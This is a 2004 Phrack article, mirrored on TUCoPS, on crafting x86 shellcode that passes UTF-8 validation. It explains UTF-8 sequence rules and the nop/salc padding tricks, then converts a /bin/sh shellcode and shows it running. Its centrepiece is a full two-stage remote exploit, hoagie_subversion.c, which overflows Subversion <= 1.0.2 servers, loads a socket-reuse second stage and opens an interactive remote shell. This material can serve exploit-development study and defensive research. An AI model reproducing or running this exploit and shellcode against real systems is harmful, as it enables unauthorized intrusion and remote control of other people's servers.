TUCoPS :: Phrack Inc. Issue #62

TUCoPS :: Phrack Inc. Issue #62 :: p62-0x09.txt
Phrack 62 File 09: UTF8 Shellcode (2004)


                           ==Phrack Inc.==

              Volume 0x0b, Issue 0x3e, Phile #0x03 of 0x00

|=--------------[ Writing UTF-8 compatible shellcodes ]-----------------=|
|=----------------------------------------------------------------------=|
|=-----------[ Thomas Wana aka. greuff  <greuff@void.at> ]--------------=|
|=----------------------------------------------------------------------=|

1 - Abstract

2 - What is UTF-8?
  2.1 - UTF-8 in detail
  2.2 - Advantages of using UTF-8

3 - The need for UTF-8 compatible shellcodes
  3.1. - UTF-8 sequences
    3.1.1 - Possible sequences
    3.1.2 - UTF-8 shortest form
    3.1.3 - Valid UTF-8 sequences

4 - Creating the shellcode
  4.1 - Bytes that come in handy
    4.1.1 - Continuation bytes
    4.1.2 - Masking continuation bytes
    4.1.3 - Chaining instructions
  4.2 - General design rules
  4.3 - Testing the code

5 - A working example
  5.1 - The original shellcode
  5.2 - UTF-8-ify
  5.3 - Let's try it out
  5.4 - A real exploit using these techniques

6. - Considerations
  6.1 - Automated shellcode transformer
  6.2 - UTF-8 in XML-files

7 - Greetings, last words

- ----------------------------------------------------------------------------

- ---[ 1. Abstract

This paper deals with the creation of shellcode that is recognized as
valid by any UTF-8 parser. The problem is not unlike the alphanumeric
shellcodes problem described by rix in phrack 57 [4], but fortunately
we have much more characters available, so we can almost always build
shellcode that is valid UTF-8 and does what we want.

I will show you a brief introduction into UTF-8 and will outline the
characters available for building shellcodes. You will see that it's
generally possible to make any shellcode valid UTF-8, but you will have
to think quite a bit. A working example is provided at the end for
reference.

- ----------------------------------------------------------------------------

- ---[ 2. What is UTF-8?

For a really great introduction into the topic, I highly suggest reading
the "UTF-8 and Unicode FAQ" [1] by Markus Kuhn.

UTF-8 is a character encoding, suitable to represent all 2^31 characters
defined by the UNICODE standard. The really neat thing about UTF-8 is
that all ASCII characters (the lower codepage in standard encodings like
ISO-8859-1 etc) are the same in UTF-8 - no conversion needed. That means,
in the best case, all your config files in /etc and every English text
document you have on your computer right now are already 100% valid UTF-8.

Unicode characters are written like this: U-0000007F, which stands for 
"the 128th character in the Unicode character space". You can see that
with this representation one can easily represent all 2^31 characters that
the Unicode-standard defines, but it's a waste of space (when you write
English or western text) and - much more important - makes the transition
to Unicode very hard (convert all the files you already have). "Hello"
would thus be encoded like:

   U-00000047 U-00000065 U-0000006C U-0000006C U-0000006F

which is in hex:

   \x47\x00\x00\x00 \x65\x00\x00\x00 \x6C\x00\x00\x00 \x6C\x00\x00\x00
   \x6F\x00\x00\x00

(for all you little endian friends).
What a waste of space! 20 bytes for 5 characters... The same text in
UTF-8:

   "Hello"

:-)

Let's look at the encoding in more detail.

- ---[ 2.1. UTF-8 in detail

UTF-8 can represent any Unicode character in an UTF-8 sequence between
1-6 bytes. 

As I already mentioned before, the characters in the lower codepage 
(ASCII-code) are the same in Unicode - they have the character values
U-00000000 - U-0000007F. You therefore still only need 7 bits to
represent all possible values. UTF-8 says, if you only need up to 7
bits for your character, stuff it into one byte and you are fine.

Unicode-characters that have higher values than U-0000007F must be
mapped to two or more bytes, as shown in the table below:

U-00000000 - U-0000007F: 0xxxxxxx  
U-00000080 - U-000007FF: 110xxxxx 10xxxxxx 
U-00000800 - U-0000FFFF: 1110xxxx 10xxxxxx 10xxxxxx
U-00010000 - U-001FFFFF: 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
U-00200000 - U-03FFFFFF: 111110xx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx
U-04000000 - U-7FFFFFFF: 1111110x 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx

Example: U-000000C4 (LATIN CAPITAL LETTER A WITH DIAERESIS)

This character's value is between U-00000080 and U-000007FF, so we
have to encode it using 2 bytes. 0xC4 is 11000100 binary. UTF-8 fills
up the places marked 'x' above with these bits, beginning at the
lowest significant bit.

    110xxxxx 10xxxxxx
+         11   000100
    -----------------
    11000011 10000100

which results in 0xC3 0x84 in UTF-8.

Example: U-0000211C (BLACK-LETTER CAPITAL R)

The same here. According to the table above, we need 3 bytes to encode
this character.

0x211C is 00100001 00011100 binary. Lets fill up the spaces:

    1110xxxx 10xxxxxx 10xxxxxx 10xxxxxx
+         00   100001   000100   011100
    -----------------------------------
    11100000 10100001 10000100 10011100

which is 0xE0 0xB1 0x84 0x9C in UTF-8.

I hope you get the point now :-)

- ---[ 2.2. Advantages of using UTF-8

UTF-8 combines the flexibility of Unicode (think of it: no more codepages
mess!) with the ease-of-use of traditional encodings. Also, the transition
to complete worldwide UTF-8 support is easy to do, because every plain-
7-bit-ASCII-file that exists right now (and existed since the 60s) will
be valid in the future too, without any modifications. Think of all your
config files!

- ----------------------------------------------------------------------------

- ---] 3. The need for UTF-8 compatible shellcodes

So, since we know now that UTF-8 is going to save our day in the future,
why would we need shellcodes that are valid UTF-8 texts?

Well, UTF-8 is the default encoding for XML, and since more and more
protocols start using XML and more and more networking daemons use these
protocols, the chances to find a vulnerability in such a program
increases. Additionally, applications start to pass user input around 
encoded in UTF-8. So sooner or later, you will overflow a buffer with
UTF-8-data. Now you want that data to be executable AND valid UTF-8.

- ---] 3.1. UTF-8 sequences

Fortunately, the situation is not _that_ desperate, compared to 
alphanumeric shellcodes. There, we only have a very limited character
set, and this really limits the instructions available. With UTF-8, we
have a much bigger character space, but there is one problem: we are
limited in the _sequence_ of characters. For example, with alphanumeric
shellcodes we don't care if the sequence is "AAAC" or "CAAA" (except
for the problem, of course, that the instructions have to make sense :))
But with UTF-8, for example, 0xBF must not follow 0xBF. Only certain
bytes may follow other bytes. This is what the UTF-8-shellcode-magic
is all about.

- ---] 3.1.1. Possible sequences

Let's look into the available "UTF-8-codespace" more closely:

U-00000000 - U-0000007F: 0xxxxxxx = 0 - 127 = 0x00 - 0x7F
   This is much like the alphanumeric shellcodes - any character
   can follow any character, so 0x41 0x42 0x43 is no problem, for
   example.

U-00000080 - U-000007FF: 110xxxxx 10xxxxxx 
   First byte: 0xC0 - 0xDF
   Second byte: 0x80 - 0xBF
   You see the problem here. A valid sequence would be 0xCD 0x80
   (do you remember that sequence - int $0x80 :)), because the byte
   following 0xCD must be between 0x80 and 0xBF. An invalid 
   sequence would be 0xCD 0x41, every UTF-8-parser chokes on 
   this.
   
U-00000800 - U-0000FFFF: 1110xxxx 10xxxxxx 10xxxxxx
   First byte: 0xE0 - 0xEF
   Following 2 bytes: 0x80 - 0xBF
   So, if the sequence starts with 0xE0 to 0xEF, there must be
   two bytes following between 0x80 and 0xBF. Fortunately we can
   often use 0x90 here, which is nop. But more on that later.

U-00010000 - U-001FFFFF: 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
   First byte: 0xF0 - 0xF7
   Following 3 bytes: 0x80 - 0xBF
   You get the point.

U-00200000 - U-03FFFFFF: 111110xx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx
   First byte: 0xF8 - 0xFB
   Following 4 bytes: 0x80 - 0xBF

U-04000000 - U-7FFFFFFF: 1111110x 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx
   First byte: 0xFC - 0xFD
   Following 5 bytes: 0x80 - 0xBF

So we know now what bytes make up UTF-8:

0x00 - 0x7F without problems
0x80 - 0xBF only as a "continuation byte" in the middle of a sequence
0xC0 - 0xDF as a start-byte of a two-byte-sequence (1 continuation byte)
0xE0 - 0xEF as a start-byte of a three-byte-sequence (2 continuation bytes)
0xF0 - 0xF7 as a start-byte of a four-byte-sequence (3 continuation bytes)
0xF8 - 0xFB as a start-byte of a five-byte-sequence (4 continuation bytes)
0xFC - 0xFD as a start-byte of a six-byte-sequence (5 continuation bytes)
0xFE - 0xFF not usable! (actually, they may be used only once in a UTF-8-
            text - the sequence 0xFF 0xFE marks the start of such a
            text)

- ---] 3.1.2. UTF-8 shortest form

Unfortunately (for us), the Corrigendum #1 to the Unicode standard [2]
specifies that UTF-8-parsers only accept the "UTF-8 shortest form"
as a valid sequence.

What's the problem here? 

Well, without that rule, we could encode the character U+0000000A (line
feed) in many different ways:

0x0A - this is the shortest possible form
0xC0 0x8A
0xE0 0x80 0x8A
0xF0 0x80 0x80 0x8A
0xF8 0x80 0x80 0x80 0x8A
0xFC 0x80 0x80 0x80 0x80 0x8A

Now that would be a big security problem, if UTF-8 parsers accepted
_all_ the possible forms. Look at the strcmp routine - it compares two
strings byte per byte to tell if they are equal or not (that still works
this way when comparing UTF-8-strings). An attacker could generate a string
with a longer form than necessary and so bypass string comparison checks,
for example.

Because of this, UTF-8-parsers are _required_ to only accept the shortest
possible form of a sequence. This rules out sequences that start with one
of the following byte patterns:

1100000x (10xxxxxx)
11100000 100xxxxx (10xxxxxx)
11110000 1000xxxx (10xxxxxx 10xxxxxx)
11111000 10000xxx (10xxxxxx 10xxxxxx 10xxxxxx)
11111100 100000xx (10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx) 

Now certain sequences become invalid, for example 0xC0 0xAF, because
the resulting UNICODE character is not encoded in its shortest form.

- ---] 3.1.3. Valid UTF-8 sequences

Now that we know all this, we can tell which sequences are valid
UTF-8:

 Code Points      1st Byte  2nd Byte 3rd Byte 4th Byte
U+0000..U+007F     00..7F          
U+0080..U+07FF     C2..DF    80..BF       
U+0800..U+0FFF     E0        A0..BF   80..BF    
U+1000..U+FFFF     E1..EF    80..BF   80..BF    
U+10000..U+3FFFF   F0        90..BF   80..BF   80..BF
U+40000..U+FFFFF   F1..F3    80..BF   80..BF   80..BF
U+100000..U+10FFFF F4        80..8F   80..BF   80..BF

Let's look how to build UTF-8-shellcode!

- ----------------------------------------------------------------------------

- ---] 4. Creating the shellcode

Before you start, be sure that you are comfortable creating "standard" 
shellcode, i.e. shellcode that has no limitations in the instructions 
available. 

We know which characters we can use and that we have to pay attention to
the character sequence. Basically, we can transform any shellcode to
UTF-8 compatible shellcode, but we often need some tricks.

- ---] 4.1. Bytes that come in handy

The biggest problem while building UTF-8-shellcode is that you have
to get the sequences right.

     "\x31\xc9"          // xor %ecx, %ecx
     "\x31\xdb"          // xor %ebx, %ebx

We start with \x31. No problem here, \x31 is between \x00 and \x7f,
so we don't need any more continuation bytes. \xc9 is next. Woops -
it is between \xc2 and \xdf, so we need a continuation byte. What
byte is next? \x31 - that is no valid continuation byte (which 
have to be between \x80 and \xbf). So we have to insert an instruction
here that doesn't harm our code *and* makes the sequence UTF-8-
compatible. 

- ---] 4.1.1. Continuation bytes

We are lucky here. The nop instruction (\x90) is the perfect 
continuation byte and simply does nothing :) (exception: you can't use
it if it is the first continuation byte in a \xe1-\xef sequence - 
see the table in 3.1.3). 

So to handle the problem above, we would simply do the following:

     "\x31\xc9"          // xor %ecx, %ecx
     "\x90"              // nop (UTF-8)
     "\x31\xdb"          // xor %ebx, %ebx
     "\x90"              // nop (UTF-8)

(I always mark bytes I inserted because of UTF-8 so I don't accidentally
optimize them away later when I need to save space)

- ---] 4.1.2. Masking continuation bytes

The other way round, you often have instructions that start with a
continuation byte, i.e. the first byte of the instruction is between
\x80 and \xbf:

     "\x8d\x0c\x24"      // lea (%esp,1),%ecx

That means you have to find an instruction that is only one byte long
and lies between \xc2 and \xdf.

The most suitable one I found here is SALC [2]. This is an *undocumented*
Intel opcode, but every Intel CPU (and compatible) supports it. The
funny thing is that even gdb reports an "invalid opcode" there. But it
works :) The opcode of SALC is \xd6 so it suits our purpose well.

The bad thing is that it has side effects. This instruction modifies
%al depending on the carry flag (see [3] for details). So always think
about what happens to your %eax register when you insert this instruction!

Back to the example, the following modification makes the sequence valid
UTF-8:

     "\xd6"              // salc (UTF-8)
     "\x8d\x0c\x24"      // lea (%esp,1),%ecx

- ---] 4.1.3. Chaining instructions

If you are lucky, instructions that begin with continuation bytes follow
instructions that need continuation bytes, so you can chain them together,
without inserting extra bytes.

You can often safe space this way just by rearranging instructions, so
think about it when you are short of space.

- ---] 4.2. General design rules

%eax is evil. Try to avoid using it in instructions that use it as a
parameter because the instruction then often contains \xc0 which is
invalid in UTF-8. Use something like

    xor %ebx, %ebx
    push %ebx
    pop %eax

(pop %eax has an instruction code of its own - and a very UTF-8 friendly
one, too :)

- ---] 4.3. Testing the code

How can you test the code? Use iconv, it comes with the glibc. You
basically convert the UTF-8 to UTF-16, and if there are no error
messages then the string is valid UTF-8. (Why UTF-16? UTF-8 sequences
can yield character codes well beyond 0xFF, so the conversion would
fail in the other direction if you would convert to LATIN1 or ASCII.
Drove me nuts some time ago, because I always thought my UTF-8 was
wrong...)

First, invalid UTF-8:

greuff@pluto:/tmp$ hexdump -C test
00000000  31 c9 31 db                                       |1.1.|
00000004
greuff@pluto:/tmp$ iconv -f UTF-8 -t UTF-16 test
ÿþ1iconv: illegal input sequence at position 1
greuff@pluto:/tmp$

And now valid UTF-8:

greuff@pluto:/tmp$ hexdump -C test
00000000  31 c9 90 31 db 90                                 |1..1..|
00000006
greuff@pluto:/tmp$ iconv -f UTF-8 -t UTF-16 test
ÿþ1P1Ðgreuff@pluto:/tmp$

- ----------------------------------------------------------------------------

- ---] 5. A working example

Now onto something practical. Let's convert a classical /bin/sh-spawning
shellcode to UTF-8.

- ---] 5.1. The original shellcode

    "\x31\xd2"                // xor    %edx,%edx
    "\x52"                    // push   %edx
    "\x68\x6e\x2f\x73\x68"    // push   $0x68732f6e
    "\x68\x2f\x2f\x62\x69"    // push   $0x69622f2f
    "\x89\xe3"                // mov    %esp,%ebx
    "\x52"                    // push   %edx
    "\x53"                    // push   %ebx
    "\x89\xe1"                // mov    %esp,%ecx
    "\xb8\x0bx\00\x00\x00"    // mov    $0xb,%eax
    "\xcd\x80"                // int    $0x80

The code simply prepares the stack in the right way, sets some registers
and jumps into kernel space (int $0x80).

- ---] 5.2. UTF-8-ify

That's an easy example, no big obstacles here. The only obvious problem
is the "mov $0xb,%eax" instruction. I am quite lazy now, so I'll just
copy %edx (which is guaranteed to contain 0 at this time) to %eax and 
increase it 11 times :) 

The new shellcode looks like this (wrapped into a C program so you
can try it out):

- ----------8<------------8<-------------8<------------8<---------------
#include <stdio.h>

char shellcode[]=
    "\x31\xd2"                // xor    %edx,%edx
    "\x90"                    // nop (UTF-8 - because previous byte was 0xd2)
    "\x52"                    // push   %edx
    "\x68\x6e\x2f\x73\x68"    // push   $0x68732f6e
    "\x68\x2f\x2f\x62\x69"    // push   $0x69622f2f
    "\xd6"                    // salc (UTF-8 - because next byte is 0x89)
    "\x89\xe3"                // mov    %esp,%ebx
    "\x90"                    // nop (UTF-8 - two nops because of 0xe3)
    "\x90"                    // nop (UTF-8)
    "\x52"                    // push   %edx
    "\x53"                    // push   %ebx
    "\xd6"                    // salc (UTF-8 - because next byte is 0x89)
    "\x89\xe1"                // mov    %esp,%ecx
    "\x90"                    // nop (UTF-8 - same here)
    "\x90"                    // nop (UTF-8)
    "\x52"                    // push %edx
    "\x58"                    // pop %eax
    "\x40"                    // inc %eax
    "\x40"                    // inc %eax
    "\x40"                    // inc %eax
    "\x40"                    // inc %eax
    "\x40"                    // inc %eax
    "\x40"                    // inc %eax
    "\x40"                    // inc %eax
    "\x40"                    // inc %eax
    "\x40"                    // inc %eax
    "\x40"                    // inc %eax
    "\x40"                    // inc %eax
    "\xcd\x80"                // int    $0x80
    ;

void main()
{
   int *ret;
   FILE *fp;
   fp=fopen("out","w");
   fwrite(shellcode,strlen(shellcode),1,fp);
   fclose(fp);
   ret=(int *)(&ret+2);
   *ret=(int)shellcode;
}
- ----------8<------------8<-------------8<------------8<---------------

As you can see, I used nop's as continuation bytes as well as salc
to mask out continuation bytes. You'll quickly get an eye for this
if you do it often.

- ---] 5.3. Let's try it out

greuff@pluto:/tmp$ gcc test.c -o test
test.c: In function `main':
test.c:37: warning: return type of `main' is not `int'
greuff@pluto:/tmp$ ./test
sh-2.05b$ exit
exit
greuff@pluto:/tmp$ hexdump -C out
00000000  31 d2 90 52 68 6e 2f 73  68 68 2f 2f 62 69 d6 89  |1..Rhn/shh//bi..|
00000010  e3 90 90 52 53 d6 89 e1  90 90 52 58 40 40 40 40  |...RS.....RX@@@@|
00000020  40 40 40 40 40 40 40 cd  80                       |@@@@@@@..|
00000029
greuff@pluto:/tmp$ iconv -f UTF-8 -t UTF-16 out && echo valid!
ÿþ1Rhn/shh//bi4RSRX@@@@@@@@@@@@valid!
greuff@pluto:/tmp$

Hooray! :-)

- ---] 5.4. A real exploit using these techniques

The recent date parsing buffer overflow in Subversion <= 1.0.2 led
me into researching these problems and writing the following exploit.
It isn't 100% finished; but it works against svn:// and http:// URLs.
The first shellcode stage is a hand crafted UTF-8-shellcode, that
searches for the socket file descriptor and loads a second stage shellcode
from the exploit and executes it. A real life example showing you that
these things actually work :)

- ----------8<------------8<-------------8<------------8<---------------
/*****************************************************************
 * hoagie_subversion.c
 *
 * Remote exploit against Subversion-Servers.
 *
 * Author: greuff <greuff@void.at>
 *
 * Tested on Subversion 1.0.0 and 0.37
 *
 * Algorithm:
 * This is a two-stage exploit. The first stage overflows a buffer
 * on the stack and leaves us ~60 bytes of machine code to be
 * executed. We try to find the socket-fd there and then do a 
 * read(2) on the socket. The exploit then sends the second stage
 * loader to the server, which can be of any length (up to the
 * obvious limits, of course). This second stage loader spawns 
 * /bin/sh on the server and connects it to the socket-fd.
 *
 * Credits:
 *    void.at
 *
 * THIS FILE IS FOR STUDYING PURPOSES ONLY AND A PROOF-OF-CONCEPT.
 * THE AUTHOR CAN NOT BE HELD RESPONSIBLE FOR ANY DAMAGE OR
 * CRIMINAL ACTIVITIES DONE USING THIS PROGRAM.
 *
 *****************************************************************/

#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <fcntl.h>
#include <netdb.h>

enum protocol { SVN, SVNSSH, HTTP, HTTPS };

char stage1loader[]=
             // begin socket fd search
             "\x31\xdb"            // xor %ebx, %ebx
             "\x90"                // nop (UTF-8)
             "\x53"                // push %ebx
             "\x58"                // pop %eax
             "\x50"                // push %eax
             "\x5f"                // pop %edi                # %eax = %ebx = %edi = 0
             "\x2c\x40"            // sub $0x40, %al
             "\x50"                // push %eax
             "\x5b"                // pop %ebx
             "\x50"                // push %eax
             "\x5a"                // pop %edx                # %ebx = %edx = 0xC0
             "\x57"                // push %edi
             "\x57"                // push %edi               # safety-0
             "\x54"                // push %esp
             "\x59"                // pop %ecx                # %ecx = pointer to the buffer
             "\x4b"                // dec %ebx                # beginloop:
             "\x57"                // push %edi
             "\x58"                // pop %eax                # clear %eax
             "\xd6"                // salc (UTF-8)
             "\xb0\x60"            // movb $0x60, %al
             "\x2c\x44"            // sub $0x44, %al          # %eax = 0x1C
             "\xcd\x80"            // int $0x80               # fstat(i, &stat)
             "\x58"                // pop %eax
             "\x58"                // pop %eax
             "\x50"                // push %eax
             "\x50"                // push %eax
             "\x38\xd4"            // cmp %dl, %ah            # uppermost 2 bits of st_mode set?
             "\x90"                // nop (UTF-8)
             "\x72\xed"            // jb beginloop
             "\x90"                // nop (UTF-8)
             "\x90"                // nop (UTF-8)             # %ebx now contains the socket fd
             // begin read(2)
             "\x57"                // push %edi
             "\x58"                // pop %eax                # zero %eax
             "\x40"                // inc %eax
             "\x40"                // inc %eax
             "\x40"                // inc %eax                # %eax=3
             //"\x54"                // push %esp
             //"\x59"                // pop %ecx                # %ecx ... address of buffer
             //"\x54"                // push %edi
             //"\x5a"                // pop %edx                # %edx ... bufferlen (0xC0)
             "\xcd\x80"            // int $0x80               # read(2) second stage loader
             "\x39\xc7"            // cmp %eax, %edi
             "\x90"                // nop (UTF-8)
             "\x7f\xf3"            // jg startover
             "\x90"                // nop (UTF-8)
             "\x90"                // nop (UTF-8)
             "\x90"                // nop (UTF-8)
             "\x54"                // push %esp
             "\xc3"                // ret                     # execute second stage loader
             "\x90"                // nop (UTF-8)
             "\0"    // %ebx still contains the fd we can use in the 2nd stage loader.
             ;

char stage2loader[]=
             // dup2 - %ebx contains the fd
             "\xb8\x3f\x00\x00\x00"   // mov $0x3F, %eax
             "\xb9\x00\x00\x00\x00"   // mov $0x0, %ecx
             "\xcd\x80"               // int $0x80
             "\xb8\x3f\x00\x00\x00"   // mov $0x3F, %eax
             "\xb9\x01\x00\x00\x00"   // mov $0x1, %ecx
             "\xcd\x80"               // int $0x80
             "\xb8\x3f\x00\x00\x00"   // mov $0x3F, %eax
             "\xb9\x02\x00\x00\x00"   // mov $0x2, %ecx
             "\xcd\x80"               // int $0x80
             // start /bin/sh
             "\x31\xd2"               // xor %edx, %edx
             "\x52"                   // push %edx
             "\x68\x6e\x2f\x73\x68"   // push $0x68732f6e
             "\x68\x2f\x2f\x62\x69"   // push $0x69622f2f
             "\x89\xe3"               // mov %esp, %ebx
             "\x52"                   // push %edx
             "\x53"                   // push %ebx
             "\x89\xe1"               // mov %esp, %ecx
             "\xb8\x0b\x00\x00\x00"   // mov $0xb, %eax
             "\xcd\x80"               // int $0x80
             "\xb8\x01\x00\x00\x00"   // mov $0x1, %eax
             "\xcd\x80"               // int %0x80     (exit)
             ;

int stage2loaderlen=69;
             
char requestfmt[]=
"REPORT %s HTTP/1.1\n"
"Host: %s\n"
"User-Agent: SVN/0.37.0 (r8509) neon/0.24.4\n"
"Content-Length: %d\n"
"Content-Type: text/xml\n"
"Connection: close\n\n"
"%s\n";

char xmlreqfmt[]=
"<?xml version=\"1.0\" encoding=\"utf-8\"?>"
"<S:dated-rev-report xmlns:S=\"svn:\" xmlns:D=\"DAV:\">"
"<D:creationdate>%s%c%c%c%c</D:creationdate>"
"</S:dated-rev-report>";

int parse_uri(char *uri,enum protocol *proto,char host[1000],int *port,char repos[1000])
{
   char *ptr;
   char bfr[1000];
   
   ptr=strstr(uri,"://");
   if(!ptr) return -1;
   *ptr=0;
   snprintf(bfr,sizeof(bfr),"%s",uri);
   if(!strcmp(bfr,"http"))
      *proto=HTTP, *port=80;
   else if(!strcmp(bfr,"svn"))
      *proto=SVN, *port=3690;
   else
   {
      printf("Unsupported protocol %s\n",bfr);
      return -1;
   }
   uri=ptr+3;
   if((ptr=strchr(uri,':')))
   {
      *ptr=0;
      snprintf(host,1000,"%s",uri);
      uri=ptr+1;
      if((ptr=strchr(uri,'/'))==NULL) return -1;
      *ptr=0;
      snprintf(bfr,1000,"%s",uri);
      *port=(int)strtol(bfr,NULL,10);
      *ptr='/';
      uri=ptr;
   }
   else if((ptr=strchr(uri,'/')))
   {
      *ptr=0;
      snprintf(host,1000,"%s",uri);
      *ptr='/';
      uri=ptr;
   }
   snprintf(repos,1000,"%s",uri);
   return 0;
}

int exec_sh(int sockfd)
{
   char snd[4096],rcv[4096];
   fd_set rset;
   while(1)
   {
      FD_ZERO(&rset);
      FD_SET(fileno(stdin),&rset);
      FD_SET(sockfd,&rset);
      select(255,&rset,NULL,NULL,NULL);
      if(FD_ISSET(fileno(stdin),&rset))
      {
         memset(snd,0,sizeof(snd));
         fgets(snd,sizeof(snd),stdin);
         write(sockfd,snd,strlen(snd));
      }
      if(FD_ISSET(sockfd,&rset))
      {
         memset(rcv,0,sizeof(rcv));
         if(read(sockfd,rcv,sizeof(rcv))<=0)
            exit(0);
         fputs(rcv,stdout);
      }
   }
}

int main(int argc, char **argv)
{
   int sock, port;
   size_t size;
   char cmd[1000], reply[1000], buffer[1000];
   char svdcmdline[1000];
   char host[1000], repos[1000], *ptr, *caddr;
   unsigned long addr;
   struct sockaddr_in sin;
   struct hostent *he;
   enum protocol proto;

   /*sock=open("output",O_CREAT|O_TRUNC|O_RDWR,0666);
   write(sock,stage1loader,strlen(stage1loader));
   close(sock);
   return 0;*/

   printf("hoagie_subversion - remote exploit against subversion servers\n"
          "by greuff@void.at\n\n");
   if(argc!=3)
   {
      printf("Usage: %s serverurl offset\n\n",argv[0]);
      printf("Examples:\n"
             "   %s svn://localhost/repository 0x41414141\n"
             "   %s http://victim.com:6666/svn 0x40414336\n\n",argv[0],argv[0]);
      printf("The offset is an alphanumeric address (or UTF-8 to be\n"
             "more precise) of a pop instruction, followed by a ret.\n"
             "Brute force when in doubt.\n\n");
      printf("When exploiting against an svn://-url, you can supply a\n"
             "binary offset too.\n\n");
      exit(1);
   }

   // parse the URI
   snprintf(svdcmdline,sizeof(svdcmdline),"%s",argv[1]);
   if(parse_uri(argv[1],&proto,host,&port,repos)<0)
   {
      printf("URI parse error\n");
      exit(1);
   }
   printf("parse_uri result:\n"
          "Protocol: %d\n"
          "Host: %s\n"
          "Port: %d\n"
          "Repository: %s\n\n",proto,host,port,repos);
   addr=strtoul(argv[2],NULL,16);
   caddr=(char *)&addr;
   printf("Using offset 0x%02x%02x%02x%02x\n",caddr[3],caddr[2],caddr[1],caddr[0]);

   sock=socket(AF_INET,SOCK_STREAM,0);
   if(sock<0)
   {
      perror("socket");
      return -1;
   }

   he=gethostbyname(host);
   if(he==NULL)
   {
      herror("gethostbyname");
      return -1;
   }
   sin.sin_family=AF_INET;
   sin.sin_port=htons(port);
   memcpy(&sin.sin_addr.s_addr,he->h_addr,sizeof(he->h_addr));
   if(connect(sock,(struct sockaddr *)&sin,sizeof(sin))<0)
   {
      perror("connect");
      return -1;
   }

   if(proto==SVN)
   {
      size=read(sock,reply,sizeof(reply));
      reply[size]=0;
      printf("Server said: %s\n",reply);
      snprintf(cmd,sizeof(cmd),"( 2 ( edit-pipeline ) %d:%s ) ",strlen(svdcmdline),svdcmdline);
      write(sock,cmd,strlen(cmd));
      size=read(sock,reply,sizeof(reply));
      reply[size]=0;
      printf("Server said: %s\n",reply);
      strcpy(cmd,"( ANONYMOUS ( 0: ) ) ");
      write(sock,cmd,strlen(cmd));
      size=read(sock,reply,sizeof(reply));
      reply[size]=0;
      printf("Server said: %s\n",reply);
      snprintf(cmd,sizeof(cmd),"( get-dated-rev ( %d:%s%c%c%c%c ) ) ",strlen(stage1loader)+4,stage1loader,
            caddr[0],caddr[1],caddr[2],caddr[3]);
      write(sock,cmd,strlen(cmd));
      size=read(sock,reply,sizeof(reply));
      reply[size]=0;
      printf("Server said: %s\n",reply); 
   }
   else if(proto==HTTP)
   {
      // preparing the request...
      snprintf(buffer,sizeof(buffer),xmlreqfmt,stage1loader,
            caddr[0],caddr[1],caddr[2],caddr[3]);
      size=strlen(buffer);
      snprintf(cmd,sizeof(cmd),requestfmt,repos,host,size,buffer);

      // now sending the request, immediately followed by the 2nd stage loader
      printf("Sending:\n%s",cmd);
      write(sock,cmd,strlen(cmd));
      sleep(1);
      write(sock,stage2loader,stage2loaderlen);
   }

   // SHELL LOOP
   printf("Entering shell loop...\n");
   exec_sh(sock);

   /*sleep(1);
   close(sock);
   printf("\nConnecting to the shell...\n");
   exec_sh(connect_sh()); */
   return 0;
}
- ----------8<------------8<-------------8<------------8<---------------

- ----------------------------------------------------------------------------

- ---] 6. Considerations

Some thoughts about the whole topic.

- ---] 6.1. Automated shellcode transformer

Perhaps it's possible to write an automated shellcode transformer that gets
a shellcode and outputs the shellcode UTF-8 compatible (similar to rix's
alphanumeric shellcode compiler [4]), but it would be a challenge. Many
decisions during the transformation process cannot be automated in my
opinion. (By the way - alphanumeric shellcode is of course valid UTF-8!
So if you want to save time and space it's not a problem, just use the 
alphanumeric shellcode compiler on your shellcode and use that!)

- ---] 6.2. UTF-8 in XML-files

When you write UTF-8 shellcode for the purpose of sending it in an XML-
document, you'll have to care for a few more things. The bytes \x00 to
\x08 are forbidden in XML, as well as the obvious characters like '<',
'>' and so on. Don't forget that when you exploit your favourite XML-
processing app!
 
- ----------------------------------------------------------------------------

- ---] 7. Greetings, last words

andi@void.at (man, get a nick :))
soletario (the indoor snowboarder)
ReAction
all the other people who often helped me out

- ----------------------------------------------------------------------------

[1] http://www.cl.cam.ac.uk/~mgk25/unicode.html
[2] http://www.unicode.org/versions/corrigendum1.html
[3] http://www.x86.org/secrets/opcodes/salc.htm
[4] http://www.phrack.org/show.php?p=57&a=15

|=[ EOF ]=---------------------------------------------------------------=|